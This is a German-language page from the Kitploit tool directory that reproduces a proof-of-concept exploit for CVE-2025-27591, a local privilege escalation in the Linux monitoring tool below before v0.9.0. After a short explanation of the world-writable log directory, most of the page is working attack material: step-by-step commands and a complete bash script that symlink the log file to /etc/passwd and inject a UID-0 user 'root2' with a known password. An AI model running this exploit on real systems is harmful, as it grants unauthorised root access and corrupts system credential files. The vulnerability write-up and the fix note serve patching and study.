Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-27591-below- — Lokale Rechteausweitung über `below` (CVE-2025-27591) - PoC Exploit | Kitploit
Tools/GitHubGitHub/visaicyber/cve-2025-27591-below-
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsFehlkonfiguration
GitHubvisaicyber/cve-2025-27591-below-

CVE-2025-27591-below-

Lokale Rechteausweitung über `below` (CVE-2025-27591) - PoC Exploit

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-27591 – Privilegieneskalation in Below

1) Einleitung

Below ist ein Linux-Tool zur Aufzeichnung und Anzeige von Systemdaten wie Hardware-Auslastung und Cgroup-Metriken.

In Versionen vor v0.9.0 läuft der systemd-Dienst von Below mit root-Rechten und erstellt weltweit beschreibbare Log-Verzeichnisse und -Dateien unter /var/log/below. Diese unsichere Konfiguration ermöglicht Symlink-Angriffe, mit denen ein unprivilegierter lokaler Benutzer seine Rechte auf root ausweiten kann.

Diesem Problem wurde CVE-2025-27591 zugewiesen.
Upstream hat es in v0.9.0 behoben.


2) Schwachstelle – Symlink-Angriff in /var/log/below

  • Below stellt sicher, dass /var/log/below zur Laufzeit 0777-Berechtigungen hat.
  • Außerdem erstellt es /var/log/below/error_root.log mit 0666-Berechtigungen.
  • Da das Verzeichnis weltweit beschreibbar ist, kann ein Angreifer die Logdatei durch einen Symlink auf eine beliebige sensible Datei (z. B. /etc/passwd) ersetzen.
  • Wenn Below als root Logs schreibt, schreibt es stattdessen in das Symlink-Ziel, was eine Privilegieneskalation ermöglicht.

Dieses Verhalten umgeht die protected_symlinks-Härtung des Kernels, da das Sticky-Bit nicht gesetzt ist.


3) Ausnutzung

Indem wir error_root.log auf /etc/passwd zeigen lassen, können wir einen neuen Root-Benutzer mit bekanntem Passwort injizieren.

Schritte

Schritt 1: Erstelle ein Backup von /etc/passwd. Erstelle immer ein Backup, bevor du Systemdateien änderst:

root@kitploit:~
cp /etc/passwd /tmp/passwd.bak

Schritt 2: Generiere einen bösartigen Benutzereintrag

root@kitploit:~
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload

Schritt 3: Erstelle einen Symlink auf das anfällige Log

root@kitploit:~
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

Schritt 4: Löse die Log-Erstellung aus

root@kitploit:~
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

Schritt 5: Überschreibe /etc/passwd

root@kitploit:~
cat /tmp/payload > /var/log/below/error_root.log

Schritt 6: Wechsle zum neuen Root-Benutzer

root@kitploit:~
su root2
# password: rooted123

4) Proof of Concept (PoC): Führe dieses Skript aus

root@kitploit:~
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'

TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"

echo "[*] CVE-2025-27591 Privilege Escalation Exploit"

# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
  echo "[!] 'below' is not available via sudo. Exiting."
  exit 1
fi

# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"

# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')

# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"

# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"

# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"

# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
CVE-2025-27591
Tool herunterladen